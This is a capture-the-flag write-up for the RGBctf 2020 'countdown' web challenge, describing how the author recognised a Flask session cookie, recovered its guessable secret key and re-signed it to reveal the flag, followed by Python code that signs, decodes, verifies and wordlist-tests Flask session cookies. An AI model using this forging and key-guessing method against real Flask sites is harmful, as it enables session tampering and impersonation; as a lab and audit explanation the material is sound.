5225225 58e78c7c3d 2020: RGBctf: countdown - 5225225 2020-07-15 00:06:11 +01:00

Countdown

writeup by 5225225 for BLÅHAJ

Web 455 points 63 solves

This challenge is simple. All you have to do is wait for the countdown to end to get the flag. The countdown ends one second before the end of the CTF, but you have fast fingers right?

writeup

You're sent to a website that contains a JavaScript countdown to a date. Above it is the phrase "Time is key.". Looking at the source code, it reads a cookie made of three base64 parts joined by dots and only uses the first part. Decoding that first part gives a JSON object describing the date the page counts down to, but changing it doesn't get the server to return the flag.

The format was similar to that of a JSON Web Token, but it couldn't be a JWT: a JWT's first segment is a header naming the signing algorithm, whereas here the first segment is the payload itself.

Intentionally making the server return a 404 by requesting a non-existent page gave us:

Not Found

The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

Looking online for that string, most of the results mention Flask (https://github.com/pallets/flask), a Python web framework. So the server is probably running Flask.

Searching online leads to itsdangerous (https://itsdangerous.palletsprojects.com/en/1.1.x/), the library Flask uses to sign its session cookies. Its format matches what we saw (a base64 payload, a base64 timestamp and a base64 signature joined by dots), so we know it's a Flask session cookie.

To break it, I used flask-unsign (https://github.com/Paradoxis/Flask-Unsign), a tool that takes a Flask session cookie and recovers the secret key using a wordlist. The built-in wordlist didn't crack the cookie, but then I went back to the page text and tried both "time" and "Time" as the secret key. "Time" turned out to be the key, so I could re-sign the cookie with a date in the past, paste it into my browser, and refresh the page, which showed the flag.
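To make the cookie format and the weak-key problem concrete, here is an added example (not code from the writeup, Flask or flask-unsign) that rebuilds Flask's session-cookie signing with the standard library only: Flask's fixed "cookie-session" salt, HMAC-based key derivation and SHA-1, as in itsdangerous 1.x, whose timestamp counts seconds from 2011-01-01. The session contents, the secret "Time" and the wordlist are constructed; `find_weak_key` is the audit check a defender would run against their own deployment to confirm the configured SECRET_KEY does not validate against a wordlist.

```python
import base64, hashlib, hmac, json, time, zlib

SALT = b"cookie-session"   # fixed salt Flask uses for its session cookies
EPOCH = 1293840000         # itsdangerous 1.x counts seconds from 2011-01-01

def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=")

def _b64d(enc):
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))

def _derived_key(secret):
    # Flask's "hmac" key derivation: SECRET_KEY never signs the cookie directly
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()

def sign_cookie(session, secret, now=None):
    """Build payload.timestamp.signature as Flask does (uncompressed payload)."""
    payload = _b64e(json.dumps(session, separators=(",", ":")).encode())
    ts = int((now or time.time()) - EPOCH)
    value = payload + b"." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    sig = hmac.new(_derived_key(secret), value, hashlib.sha1).digest()
    return (value + b"." + _b64e(sig)).decode()

def decode_payload(cookie):
    """Read the first part without any key: this is all the page's JS uses."""
    raw = cookie.encode()
    compressed = raw.startswith(b".")   # itsdangerous marks zlib payloads with "."
    first = (raw[1:] if compressed else raw).split(b".")[0]
    data = _b64d(first)
    return json.loads(zlib.decompress(data) if compressed else data)

def verify_cookie(cookie, secret):
    """Server-side check: recompute the HMAC over payload.timestamp."""
    value, sig = cookie.encode().rsplit(b".", 1)
    expected = hmac.new(_derived_key(secret), value, hashlib.sha1).digest()
    return hmac.compare_digest(expected, _b64d(sig))

def find_weak_key(cookie, candidates):
    """Audit: return the wordlist entry that validates the cookie, else None."""
    return next((c for c in candidates if verify_cookie(cookie, c)), None)

if __name__ == "__main__":
    # constructed session and secret, mirroring the challenge's guessable key
    cookie = sign_cookie({"end": "2020-07-16T00:00:00Z"}, "Time", now=1594771200)
    print(cookie)
    print(decode_payload(cookie))                       # readable without the key
    print(find_weak_key(cookie, ["password", "time", "Time"]))   # "Time"
```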